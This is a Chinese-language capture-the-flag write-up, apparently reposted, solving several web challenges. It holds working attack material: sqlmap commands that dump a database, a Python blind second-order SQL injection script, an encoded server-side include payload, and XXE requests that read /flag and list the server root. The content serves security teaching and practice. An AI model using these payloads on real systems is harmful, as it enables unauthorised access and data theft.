内容简介:SimpleBBS1.登录处报错
SimpleBBS
题目解析:
1.登录处报错
2.导出burp的包使用sqlmap进行测试
sqlmap -r bbs.txt --dbs
available databases [2]: [*] bbs [*] information_schema
sqlmap -r bbs.txt -D "bbs" --tables
Database: bbs [7 tables] +----------+ | admin | | articles | | comments | | flag | | messages | | sections | | users | +----------+
sqlmap -r bbs.txt -D "bbs" --tables
Database: bbs [7 tables] +----------+ | admin | | articles | | comments | | flag | | messages | | sections | | users | +----------+
sqlmap -r bbs.txt -D "bbs" -T "flag" -C "f" --dump
# 测试的时候已经没有flag了.... Database: bbs Table: flag [1 entry] +---------+ | f | +---------+ | <blank> | +---------+
SimpleBlog
题目描述:
SimpleBlog
题目解析:
刚开始一直再找文件包含想看下源码,后来是在找不到就认真做了下题目。发现直接二次注入就好了,如果注入内容存在后面做题的分数会为0。
import requests
import string
import urllib
flag=""
register = 'http://210.32.4.20/register.php'
login = 'http://210.32.4.20/login.php'
answer = 'http://210.32.4.20/answer.php'
logout = 'http://210.32.4.20/logout.php'
for i in range(3,50):
for j in range(32,126):
print "i:",chr(i),"j",chr(j)
req = requests.session()
payload = "\' or if((ascii(substr((select flag from flag),"+str(i)+",1))="+str(j)+"),1,0)='1' or \'"
post_answer = {'1.a':'on'}
login_data = {'username':urllib.quote(payload),'password':'zeroyu'}
r = req.post(register,data=login_data)
lin = req.post(login,data=login_data)
ans = req.post(answer,data=post_answer)
if 'Your grades is 0' not in ans.content:
f=chr(j)
print f
flag=flag+f
print flag
break
lout = req.get(logout)
SimpleServerInjection
题目描述:
SimpleServerInjection, SSI, flag in current directory
题目解析:
了解到是ssi,提示了读flag文件,常规payload发现 # 号后内容被截断,于是采用编码绕过。
payload
<!--%23include+virtual%3D"flag"+-->
参考:
https://junookyo.blogspot.com/2012/03/shtml-bypass-view-symlink-server-side.html
https://www.secpulse.com/archives/66934.html
http://xdxd.love/2015/12/09/ssi%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D/
SimpleExtensionExplorerInjection
题目描述:
SimpleExtensionExplorerInjection, XXE, /flag
http://210.32.4.21:8080/www/index.html
题目解析:
1.burp抓包发现采用json格式传输数据
2.修改 Content-Type 字段为 xml ,尝试post xml格式数据
根据请求和响应发现存在xxe漏洞
请求
POST /www/ HTTP/1.1 Host: 210.32.4.21:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://210.32.4.21:8080/www/index.html Content-Type: application/xml; charset=UTF-8 Content-Length: 73 Connection: close <?xml version="1.0" encoding="UTF-8" ?> <name>zzz</name> <age>zzz</age>
响应
HTTP/1.1 500
Content-Type: application/json;charset=UTF-8
Date: Fri, 16 Nov 2018 09:17:40 GMT
Connection: close
Content-Length: 254
{"timestamp":"2018-11-16T09:17:40.797+0000","status":500,"error":"Internal Server Error","message":"org.xml.sax.SAXParseException; lineNumber: 3; columnNumber: 2; The markup in the document following the root element must be well-formed.","path":"/www/"}
3.依据提示 /flag ,直接去读文件
请求
POST /www/ HTTP/1.1 Host: 210.32.4.21:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://210.32.4.21:8080/www/index.html Content-Type: application/xml; charset=UTF-8 Content-Length: 151 Connection: close <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///flag" >]> <root> <name>name</name> <age>&xxe;</age> </root>
响应:
HTTP/1.1 200
Content-Type: text/plain;charset=UTF-8
Content-Length: 64
Date: Fri, 16 Nov 2018 09:21:23 GMT
Connection: close
Received name: name, age: EIS{bce52c116d589ae9472e59a162cc90e2}
参考:
https://blog.netspi.com/playing-content-type-xxe-json-endpoints/
https://thief.one/2017/06/20/1/
SimplePrintEventLogger
题目描述:
SimplePrintEventLogger, same server as SimpleExtensionExploreInjection , RCE, flag in /
http://210.32.4.21:8080/www/index.html
题目解析:
同一个题目的服务器上,flag在根目录,手动翻一下就好
请求
POST /www/ HTTP/1.1 Host: 210.32.4.21:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://210.32.4.21:8080/www/index.html Content-Type: application/xml; charset=UTF-8 Content-Length: 147 Connection: close <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///" >]> <root> <name>name</name> <age>&xxe;</age> </root>
响应
HTTP/1.1 200 Content-Type: text/plain;charset=UTF-8 Content-Length: 169 Date: Fri, 16 Nov 2018 16:46:04 GMT Connection: close Received name: name, age: .dockerenv bin boot dev docker-java-home etc flag flagvvvvvaaaagegsgag2333 home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
读取 flagvvvvvaaaagegsgag2333
请求
POST /www/ HTTP/1.1 Host: 210.32.4.21:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://210.32.4.21:8080/www/index.html Content-Type: application/xml; charset=UTF-8 Content-Length: 171 Connection: close <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///flagvvvvvaaaagegsgag2333" >]> <root> <name>name</name> <age>&xxe;</age> </root>
响应
HTTP/1.1 200
Content-Type: text/plain;charset=UTF-8
Content-Length: 64
Date: Fri, 16 Nov 2018 16:47:38 GMT
Connection: close
Received name: name, age: EIS{f501e9c5323c560b0a40192ce9b7ad38}
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Data Structures and Algorithms in Java
Robert Lafore / Sams / 2002-11-06 / USD 64.99
Data Structures and Algorithms in Java, Second Edition is designed to be easy to read and understand although the topic itself is complicated. Algorithms are the procedures that software programs use......一起来看看 《Data Structures and Algorithms in Java》 这本书的介绍吧!
